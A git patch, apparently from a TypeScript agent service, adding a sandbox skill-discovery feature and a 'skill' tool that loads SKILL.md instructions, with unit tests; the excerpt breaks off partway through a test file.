 .../handleChatWorkflowStream.test.ts          |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  21 +++
 lib/skills/__tests__/discoverSkills.test.ts   | 158 ++++++++++++++++
 lib/skills/__tests__/extractSkillBody.test.ts |  22 +++
 lib/skills/__tests__/findSkillFile.test.ts    |  34 ++++
 .../getGlobalSkillsDirectory.test.ts          |  15 ++
 .../getSandboxSkillDirectories.test.ts        |  23 +++
 lib/skills/__tests__/getSkills.test.ts        |  31 ++++
 .../__tests__/injectSkillDirectory.test.ts    |  14 ++
 .../__tests__/parseSkillFrontmatter.test.ts   |  56 ++++++
 .../__tests__/substituteArguments.test.ts     |  22 +++
 lib/skills/discoverSkills.ts                  |  89 +++++++++
 lib/skills/extractSkillBody.ts                |  14 ++
 lib/skills/findSkillFile.ts                   |  33 ++++
 lib/skills/getGlobalSkillsDirectory.ts        |  14 ++
 lib/skills/getSandboxSkillDirectories.ts      |  16 ++
 lib/skills/getSkills.ts                       |  22 +++
 lib/skills/injectSkillDirectory.ts            |  11 ++
 lib/skills/parseSkillFrontmatter.ts           |  52 ++++++
 lib/skills/skillTypes.ts                      |  76 ++++++++
 lib/skills/substituteArguments.ts             |  14 ++
 27 files changed, 1071 insertions(+), 19 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/skillTool.test.ts
 create mode 100644 lib/agent/tools/skillTool.ts
 create mode 100644 lib/skills/__tests__/discoverSkills.test.ts
 create mode 100644 lib/skills/__tests__/extractSkillBody.test.ts
 create mode 100644 lib/skills/__tests__/findSkillFile.test.ts
 create mode 100644 lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
 create mode 100644 lib/skills/__tests__/getSandboxSkillDirectories.test.ts
 create mode 100644 lib/skills/__tests__/getSkills.test.ts
 create mode 100644 lib/skills/__tests__/injectSkillDirectory.test.ts
 create mode 100644 lib/skills/__tests__/parseSkillFrontmatter.test.ts
 create mode 100644 lib/skills/__tests__/substituteArguments.test.ts
 create mode 100644 lib/skills/discoverSkills.ts
 create mode 100644 lib/skills/extractSkillBody.ts
 create mode 100644 lib/skills/findSkillFile.ts
 create mode 100644 lib/skills/getGlobalSkillsDirectory.ts
 create mode 100644 lib/skills/getSandboxSkillDirectories.ts
 create mode 100644 lib/skills/getSkills.ts
 create mode 100644 lib/skills/injectSkillDirectory.ts
 create mode 100644 lib/skills/parseSkillFrontmatter.ts
 create mode 100644 lib/skills/skillTypes.ts
 create mode 100644 lib/skills/substituteArguments.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index f9a894195..704035c64 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -42,7 +42,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   });
 
   const modelMessages = convertToModelMessages(input.messages);
-  const tools = buildAgentTools();
+  const tools = buildAgentTools({ skills: input.agentContext.skills });
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 5478c59ca..fb5d99a5a 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
-const EXPECTED_TOOL_NAMES = [
+const BASE_TOOLS = [
   "bash",
   "read",
   "write",
@@ -13,19 +13,50 @@ const EXPECTED_TOOL_NAMES = [
 ] as const;
 
 describe("buildAgentTools", () => {
-  it("returns a tools record with all 8 leaf tools registered", () => {
+  it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => {
     const tools = buildAgentTools();
-    for (const name of EXPECTED_TOOL_NAMES) {
+    for (const name of BASE_TOOLS) {
       expect(tools).toHaveProperty(name);
     }
+    expect(tools).not.toHaveProperty("skill");
+  });
+
+  it("registers the skill tool when a non-empty skill catalog is provided", () => {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "commit",
+          description: "Make a commit",
+          path: "/sandbox/mono/skills/commit",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    });
+    expect(tools).toHaveProperty("skill");
+    for (const name of BASE_TOOLS) {
+      expect(tools).toHaveProperty(name);
+    }
+  });
+
+  it("omits the skill tool when an empty array is passed", () => {
+    const tools = buildAgentTools({ skills: [] });
+    expect(tools).not.toHaveProperty("skill");
   });
 
   it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
-    const tools = buildAgentTools() as Record<
-      string,
-      { description?: unknown; inputSchema?: unknown; execute?: unknown }
-    >;
-    for (const name of EXPECTED_TOOL_NAMES) {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "foo",
+          description: "x",
+          path: "/p",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    }) as Record<string, { description?: unknown; inputSchema?: unknown; execute?: unknown }>;
+    for (const name of [...BASE_TOOLS, "skill"]) {
       const t = tools[name]!;
       expect(typeof t.description).toBe("string");
       expect(t.inputSchema).toBeDefined();
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index f9cbc2b39..393b32889 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -6,24 +6,27 @@ import { grepTool } from "@/lib/agent/tools/grepTool";
 import { globTool } from "@/lib/agent/tools/globTool";
 import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
 import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
+import { skillTool } from "@/lib/agent/tools/skillTool";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
- * Each tool reads its sandbox handle + recoup creds from `experimental_context`
- * at execute time — the factory takes no arguments because the tools are
- * stateless modulo that context.
+ * Each tool reads its sandbox handle + per-prompt context from
+ * `experimental_context` at execute time — the factory is otherwise stateless.
  *
- * Currently ships 8 leaf tools:
- *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ * Currently ships 9 tools:
+ *   - 6 file/shell: bash, read, write, edit, grep, glob
  *   - todo_write (planning surface; stateless, echoes the list back)
  *   - web_fetch (HTTP via curl inside the sandbox)
+ *   - skill (load a discovered skill's SKILL.md; only registered when the
+ *     sandbox has skills available, so models without any skill catalog
+ *     don't see the tool at all and never call it speculatively)
  *
- * Composite tools (`task` subagent, `ask_user_question` UI part,
- * `skill` skill discovery) port in a follow-up PR — they require
- * subagent context plumbing / UI rendering / skill discovery infra
- * that isn't in api today.
+ * @param options.skills - Discovered skill catalog. When empty / undefined,
+ *   `skill` is omitted from the tool record so the model doesn't see it.
  */
-export function buildAgentTools() {
+export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) {
+  const hasSkills = (options.skills?.length ?? 0) > 0;
   return {
     bash: bashTool,
     read: readFileTool,
@@ -33,6 +36,7 @@ export function buildAgentTools() {
     glob: globTool,
     todo_write: todoWriteTool,
     web_fetch: webFetchTool,
+    ...(hasSkills ? { skill: skillTool } : {}),
   };
 }
 
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
index 63d2a1b7e..acb455164 100644
--- a/lib/agent/tools/AgentContext.ts
+++ b/lib/agent/tools/AgentContext.ts
@@ -1,4 +1,5 @@
 import type { VercelState } from "@/lib/sandbox/vercel/state";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Per-tool-call context threaded into the agent via `streamText`'s
@@ -31,4 +32,14 @@ export type AgentContext = {
    * Public information — no security risk in exposing.
    */
   recoupOrgId?: string;
+  /**
+   * Skills discovered in the sandbox before workflow start (handler calls
+   * `discoverSkills(sandbox, await getSandboxSkillDirectories(sandbox))`).
+   * The `skillTool` reads this list to:
+   *   - resolve names → SKILL.md paths
+   *   - filter out skills with `disable-model-invocation`
+   *   - surface "Available skills" hints when a model picks an unknown name
+   * Empty / undefined when discovery finds no skills or fails (best-effort).
+   */
+  skills?: SkillMetadata[];
 };
diff --git a/lib/agent/tools/__tests__/skillTool.test.ts b/lib/agent/tools/__tests__/skillTool.test.ts
new file mode 100644
index 000000000..0b3196dbc
--- /dev/null
+++ b/lib/agent/tools/__tests__/skillTool.test.ts
@@ -0,0 +1,169 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { skillTool } from "@/lib/agent/tools/skillTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const baseCtx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(readFile: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", readFile };
+}
+
+function skillMd(body: string) {
+  return `---\nname: commit\ndescription: Make a commit\n---\n\n${body}`;
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("skillTool", () => {
+  it("returns success:false with available skills when the requested skill isn't in context", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "unknown" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "Make a commit",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+          {
+            name: "deploy",
+            description: "Deploy",
+            path: "/sandbox/mono/skills/deploy",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Available skills: commit, deploy/);
+  });
+
+  it("returns success:false when no skills are loaded", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: { ...baseCtx, skills: [] },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Available skills: none/);
+  });
+
+  it("matches the skill name case-insensitively (slash-command behavior)", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("body content")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!(
+      { skill: "COMMIT" }, // model typed it loud
+      {
+        experimental_context: {
+          ...baseCtx,
+          skills: [
+            {
+              name: "commit",
+              description: "x",
+              path: "/sandbox/mono/skills/commit",
+              filename: "SKILL.md",
+              options: {},
+            },
+          ],
+        },
+      } as never,
+    )) as { success: boolean; skillName: string };
+    expect(result.success).toBe(true);
+    expect(result.skillName).toBe("COMMIT");
+  });
+
+  it("returns the SKILL.md body with skill directory injected", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("Run git commit -m ...")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; content: string; skillPath: string };
+    expect(result.success).toBe(true);
+    expect(result.skillPath).toBe("/sandbox/mono/skills/commit");
+    expect(result.content).toContain("Skill directory: /sandbox/mono/skills/commit");
+    expect(result.content).toContain("Run git commit -m ...");
+    expect(sb.readFile).toHaveBeenCalledWith("/sandbox/mono/skills/commit/SKILL.md", "utf-8");
+  });
+
+  it("substitutes $ARGUMENTS in the skill body when args are provided", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd('git commit -m "$ARGUMENTS"')));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit", args: "fix bug" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { content: string };
+    expect(result.content).toContain('git commit -m "fix bug"');
+    expect(result.content).not.toContain("$ARGUMENTS");
+  });
+
+  it("rejects skills with disable-model-invocation set", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "internal" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "internal",
+            description: "x",
+            path: "/sandbox/mono/skills/internal",
+            filename: "SKILL.md",
+            options: { disableModelInvocation: true },
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/cannot be invoked/);
+  });
+
+  it("returns success:false when the SKILL.md read fails", async () => {
+    const sb = makeSandbox(vi.fn().mockRejectedValue(new Error("ENOENT")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/ENOENT/);
+  });
+});
diff --git a/lib/agent/tools/skillTool.ts b/lib/agent/tools/skillTool.ts
new file mode 100644
index 000000000..8c74f35d1
--- /dev/null
+++ b/lib/agent/tools/skillTool.ts
@@ -0,0 +1,87 @@
+import * as path from "path";
+import { tool } from "ai";
+import { z } from "zod";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { extractSkillBody } from "@/lib/skills/extractSkillBody";
+import { getSkills } from "@/lib/skills/getSkills";
+import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory";
+import { substituteArguments } from "@/lib/skills/substituteArguments";
+
+const skillInputSchema = z.object({
+  skill: z.string().describe("The skill name to invoke"),
+  args: z.string().optional().describe("Optional arguments for the skill"),
+});
+
+/**
+ * `skill` — load a discovered skill's SKILL.md body and return it
+ * to the model. The model then follows the loaded instructions in
+ * subsequent turns (using `bash`, `read`, `write`, etc. to actually
+ * carry them out). The skill catalog itself is discovered in the
+ * handler before workflow start and threaded via `AgentContext.skills`.
+ *
+ * Matching is case-insensitive so the model can resolve a slash command
+ * like `/Commit` against a skill named `commit`. Skills marked with
+ * `disable-model-invocation` in their frontmatter are filtered out at
+ * the gate — only the user (via a server-side dispatcher) can run them.
+ */
+export const skillTool = tool({
+  description: `Execute a skill within the main conversation.
+
+When users ask you to perform tasks, check if any of the available skills can help complete the task more effectively. Skills provide specialized capabilities and domain knowledge.
+
+When users ask you to run a "slash command" or reference "/<something>" (e.g., "/commit", "/review-pr"), they are referring to a skill. Use this tool to invoke the corresponding skill.
+
+How to invoke:
+- Use this tool with the skill name and optional arguments
+- Examples:
+  - skill: "pdf" — invoke the pdf skill
+  - skill: "commit", args: "-m 'Fix bug'" — invoke with arguments
+
+Important:
+- When a skill is relevant, invoke this tool IMMEDIATELY as your first action
+- When the user's message starts with "/<name>", they are invoking a skill — call this tool FIRST before any other tool
+- NEVER just announce or mention a skill without actually calling this tool
+- Only use skills listed in "Available skills" in your system prompt`,
+  inputSchema: skillInputSchema,
+  execute: async ({ skill, args }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "skill");
+    const skills = getSkills(experimental_context);
+
+    const normalized = skill.toLowerCase();
+    const found = skills.find(s => s.name.toLowerCase() === normalized);
+    if (!found) {
+      const available = skills.map(s => s.name).join(", ");
+      return {
+        success: false,
+        error: `Skill '${skill}' not found. Available skills: ${available || "none"}`,
+      };
+    }
+
+    if (found.options.disableModelInvocation) {
+      return {
+        success: false,
+        error: `Skill '${skill}' cannot be invoked by the model (disable-model-invocation is set)`,
+      };
+    }
+
+    const skillFilePath = path.join(found.path, found.filename);
+    let fileContent: string;
+    try {
+      fileContent = await sandbox.readFile(skillFilePath, "utf-8");
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to read skill file: ${message}` };
+    }
+
+    const body = extractSkillBody(fileContent);
+    const bodyWithDir = injectSkillDirectory(body, found.path);
+    const content = substituteArguments(bodyWithDir, args);
+
+    return {
+      success: true,
+      skillName: skill,
+      skillPath: found.path,
+      content,
+    };
+  },
+});
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
index fb3b434f1..702edb918 100644
--- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -39,6 +39,19 @@ vi.mock("@/lib/networking/getCorsHeaders", () => ({
 }));
 vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") }));
 
+// Stub sandbox connection + skill discovery so handler tests don't actually
+// try to talk to Vercel Sandbox / parse SKILL.md files. The handler treats
+// discovery failures as non-fatal (empty catalog), but we mock to keep tests fast.
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(async () => ({ workingDirectory: "/sandbox/mono" })),
+}));
+vi.mock("@/lib/skills/discoverSkills", () => ({
+  discoverSkills: vi.fn(async () => []),
+}));
+vi.mock("@/lib/skills/getSandboxSkillDirectories", () => ({
+  getSandboxSkillDirectories: vi.fn(async () => ["/sandbox/mono/skills"]), // real fn is async
+}));
+
 const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
 const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
 const SESSION_ID = "22222222-2222-2222-2222-222222222222";
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 6ceb0c867..818c70f8c 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -15,7 +15,10 @@ import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
 import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
 import { extractOrgId } from "@/lib/recoupable/extractOrgId";
 import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
 import type { VercelState } from "@/lib/sandbox/vercel/state";
+import { discoverSkills } from "@/lib/skills/discoverSkills";
+import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories";
 import generateUUID from "@/lib/uuid/generateUUID";
 
 const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
@@ -90,6 +93,23 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   const recoupOrgId = session.clone_url
     ? (extractOrgId(session.clone_url) ?? undefined)
     : undefined;
+
+  // Connect the sandbox up-front so we can discover the installed skills
+  // before starting the workflow. The connected handle isn't passed into
+  // the workflow (it's not durably serializable) — only `sandbox.state`
+  // is. Tools reconnect via `connectVercel(state)` inside `"use step"`.
+  let skills: Awaited<ReturnType<typeof discoverSkills>> = [];
+  try {
+    const sandbox = await connectVercel(session.sandbox_state as VercelState);
+    const dirs = await getSandboxSkillDirectories(sandbox);
+    skills = await discoverSkills(sandbox, dirs);
+  } catch (error) {
+    console.error(
+      "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:",
+      error,
+    );
+  }
+
   const run = await start(runAgentWorkflow, [
     {
       messages: validated.messages,
@@ -105,6 +125,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
           workingDirectory: DEFAULT_WORKING_DIRECTORY,
         },
         recoupOrgId,
+        skills,
         // No `recoupAccessToken`: handing the long-lived api key to bash
         // would let any model-issued command exfiltrate it via env. Proper
         // short-lived token minting lands alongside the `skill` tool port
diff --git a/lib/skills/__tests__/discoverSkills.test.ts b/lib/skills/__tests__/discoverSkills.test.ts
new file mode 100644
index 000000000..a252ba0b8
--- /dev/null
+++ b/lib/skills/__tests__/discoverSkills.test.ts
@@ -0,0 +1,158 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { discoverSkills } from "@/lib/skills/discoverSkills";
+
+function makeStat(isDir: boolean) {
+  return { isDirectory: () => isDir, isFile: () => !isDir, size: 0, mtimeMs: 0 };
+}
+
+function makeDirent(name: string, isDir: boolean) {
+  return {
+    name,
+    isDirectory: () => isDir,
+    isFile: () => !isDir,
+    isSymbolicLink: () => false,
+    isBlockDevice: () => false,
+    isCharacterDevice: () => false,
+    isFIFO: () => false,
+    isSocket: () => false,
+  };
+}
+
+function frontmatter(name: string, description: string, extra = "") {
+  return `---\nname: ${name}\ndescription: ${description}\n${extra}---\n\nBody for ${name}`;
+}
+
+function makeSandbox() {
+  const files = new Map<string, string>();
+  return {
+    files,
+    workingDirectory: "/sandbox/mono",
+    stat: vi.fn(async (path: string) => {
+      if (path.endsWith("/skills")) return makeStat(true);
+      if (path.startsWith("/sandbox/mono/skills/") && !path.endsWith(".md")) return makeStat(true);
+      throw new Error(`ENOENT: ${path}`);
+    }),
+    readdir: vi.fn(),
+    access: vi.fn(async (path: string) => {
+      if (!files.has(path)) throw new Error(`ENOENT: ${path}`);
+    }),
+    readFile: vi.fn(async (path: string) => {
+      const content = files.get(path);
+      if (content === undefined) throw new Error(`ENOENT: ${path}`);
+      return content;
+    }),
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("discoverSkills", () => {
+  it("discovers a single skill with name + description + path", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("commit", true)]);
+    sb.files.set("/sandbox/mono/skills/commit/SKILL.md", frontmatter("commit", "Make a commit"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]).toMatchObject({
+      name: "commit",
+      description: "Make a commit",
+      path: "/sandbox/mono/skills/commit",
+      filename: "SKILL.md",
+    });
+  });
+
+  it("falls back to lowercase skill.md when SKILL.md is missing", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("lowercase", true)]);
+    sb.files.set("/sandbox/mono/skills/lowercase/skill.md", frontmatter("lowercase", "lc"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.filename).toBe("skill.md");
+  });
+
+  it("returns [] when the directory does not exist", async () => {
+    const sb = makeSandbox();
+    sb.stat.mockRejectedValue(new Error("ENOENT"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toEqual([]);
+  });
+
+  it("skips entries that aren't directories", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("README.md", false), makeDirent("good", true)]);
+    sb.files.set("/sandbox/mono/skills/good/SKILL.md", frontmatter("good", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("good");
+  });
+
+  it("skips subdirs without SKILL.md / skill.md", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("empty", true), makeDirent("real", true)]);
+    sb.files.set("/sandbox/mono/skills/real/SKILL.md", frontmatter("real", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("real");
+  });
+
+  it("skips skills with invalid frontmatter (missing required fields)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("broken", true), makeDirent("ok", true)]);
+    sb.files.set("/sandbox/mono/skills/broken/SKILL.md", "---\nname: broken\n---\nno desc");
+    sb.files.set("/sandbox/mono/skills/ok/SKILL.md", frontmatter("ok", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("ok");
+  });
+
+  it("skips skills whose names shadow built-in commands (model / resume / new)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([
+      makeDirent("model", true),
+      makeDirent("resume", true),
+      makeDirent("new", true),
+      makeDirent("kept", true),
+    ]);
+    for (const name of ["model", "resume", "new", "kept"]) {
+      sb.files.set(`/sandbox/mono/skills/${name}/SKILL.md`, frontmatter(name, "x"));
+    }
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills.map(s => s.name)).toEqual(["kept"]);
+  });
+
+  it("dedupes by name across multiple directories (first wins, case-insensitive)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockImplementation(async (dir: string) => {
+      if (dir === "/sandbox/mono/skills") return [makeDirent("Foo", true)] as never;
+      if (dir === "/global/.skills") return [makeDirent("foo", true)] as never;
+      return [];
+    });
+    sb.files.set("/sandbox/mono/skills/Foo/SKILL.md", frontmatter("Foo", "project"));
+    sb.files.set("/global/.skills/foo/SKILL.md", frontmatter("foo", "global"));
+    sb.stat.mockImplementation(async (p: string) => {
+      if (p === "/sandbox/mono/skills" || p === "/global/.skills") return makeStat(true);
+      throw new Error("ENOENT");
+    });
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills", "/global/.skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.description).toBe("project"); // first dir wins
+  });
+
+  it("populates options from frontmatter (camelCase + split lists)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("scoped", true)]);
+    sb.files.set(
+      "/sandbox/mono/skills/scoped/SKILL.md",
+      frontmatter(
+        "scoped",
+        "limited",
+        "allowed-tools: bash, read\ndisable-model-invocation: true\n",
+      ),
+    );
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills[0]?.options).toEqual({
+      disableModelInvocation: true,
+      allowedTools: ["bash", "read"],
+    });
+  });
+});
diff --git a/lib/skills/__tests__/extractSkillBody.test.ts b/lib/skills/__tests__/extractSkillBody.test.ts
new file mode 100644
index 000000000..b8f62bbc8
--- /dev/null
+++ b/lib/skills/__tests__/extractSkillBody.test.ts
@@ -0,0 +1,22 @@
+import { describe, it, expect } from "vitest";
+import { extractSkillBody } from "@/lib/skills/extractSkillBody";
+
+describe("extractSkillBody", () => {
+  it("strips YAML frontmatter and returns the body", () => {
+    const md = "---\nname: foo\ndescription: bar\n---\n# Heading\n\nBody.";
+    expect(extractSkillBody(md)).toBe("# Heading\n\nBody.");
+  });
+
+  it("returns the full content when no frontmatter is present", () => {
+    expect(extractSkillBody("# Just a heading")).toBe("# Just a heading");
+  });
+
+  it("trims surrounding whitespace", () => {
+    expect(extractSkillBody("---\nname: x\ndescription: y\n---\n\n\nbody\n\n")).toBe("body");
+  });
+
+  it("tolerates Windows-style CRLF line endings", () => {
+    const md = "---\r\nname: foo\r\ndescription: bar\r\n---\r\nbody";
+    expect(extractSkillBody(md)).toBe("body");
+  });
+});
diff --git a/lib/skills/__tests__/findSkillFile.test.ts b/lib/skills/__tests__/findSkillFile.test.ts
new file mode 100644
index 000000000..2d15de6fa
--- /dev/null
+++ b/lib/skills/__tests__/findSkillFile.test.ts
@@ -0,0 +1,34 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { findSkillFile } from "@/lib/skills/findSkillFile";
+
+beforeEach(() => vi.clearAllMocks());
+
+function makeSandbox(existing: string[]) {
+  const set = new Set(existing);
+  return {
+    access: vi.fn(async (p: string) => {
+      if (!set.has(p)) throw new Error(`ENOENT: ${p}`);
+    }),
+  };
+}
+
+describe("findSkillFile", () => {
+  it("prefers uppercase SKILL.md when both casings exist", async () => {
+    const sb = makeSandbox(["/skills/foo/SKILL.md", "/skills/foo/skill.md"]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBe("/skills/foo/SKILL.md");
+    expect(sb.access).toHaveBeenCalledWith("/skills/foo/SKILL.md");
+  });
+
+  it("falls back to lowercase skill.md when SKILL.md is missing", async () => {
+    const sb = makeSandbox(["/skills/foo/skill.md"]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBe("/skills/foo/skill.md");
+  });
+
+  it("returns null when neither casing exists", async () => {
+    const sb = makeSandbox([]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBeNull();
+  });
+});
diff --git a/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
new file mode 100644
index 000000000..7833f2450
--- /dev/null
+++ b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
@@ -0,0 +1,15 @@
+import { describe, it, expect } from "vitest";
+import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory";
+
+describe("getGlobalSkillsDirectory", () => {
+  it("returns <home>/.agents/skills", () => {
+    expect(getGlobalSkillsDirectory("/root")).toBe("/root/.agents/skills");
+    expect(getGlobalSkillsDirectory("/home/vercel-sandbox")).toBe(
+      "/home/vercel-sandbox/.agents/skills",
+    );
+  });
+
+  it("handles trailing slash on input", () => {
+    expect(getGlobalSkillsDirectory("/root/")).toBe("/root/.agents/skills");
+  });
+});
diff --git a/lib/skills/__tests__/getSandboxSkillDirectories.test.ts b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts
new file mode 100644
index 000000000..5762ccea1
--- /dev/null
+++ b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts
@@ -0,0 +1,23 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories";
